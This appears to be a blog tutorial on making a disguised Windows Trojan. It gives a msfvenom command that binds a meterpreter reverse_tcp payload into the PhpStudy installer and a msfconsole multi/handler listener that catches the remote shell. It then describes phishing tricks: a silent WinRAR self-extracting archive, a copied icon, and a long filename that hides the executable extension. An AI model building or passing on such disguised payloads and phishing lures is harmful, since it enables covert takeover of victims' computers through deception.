This article is transferred to my own cloud blog https://www.xy586.top
Article Directory
Bundled Trojan
Use msfvenom to make a Trojan horse program:
#生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe
Put the Trojan file into the target machine
#设置监听反弹
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.138
set lport 4444
run
Click the Trojan horse program to execute, the monitoring port gets a response, and the computer is successfully controlled.
Enter the shell to completely control the computer
RAR automatic decompression
Set up automatic decompression operation
Set the rar automatic decompression format to run malicious programs when decompressing
Simulate text document phishing
Improved Trojan horse program:
Disguise: bind the webpage code and app, then compress, use WinRAR to create a self-extracting format
Click Advanced, add the decompression path in the general in the self-extracting options,
Fill in the program that runs before and after decompression in the Setup Program tab,
Silent mode selection in the mode tab hide all
Use BeCyIconGrabber.exe software to extract the software picture ico we want
In the text and icon options, select to load the icon icon we just generated
Generated the Trojan horse program that we disguised
At the same time, the file name can be changed to a longer name. When the file is not selected, the back part of the file name will be hidden to achieve the effect of hiding the suffix name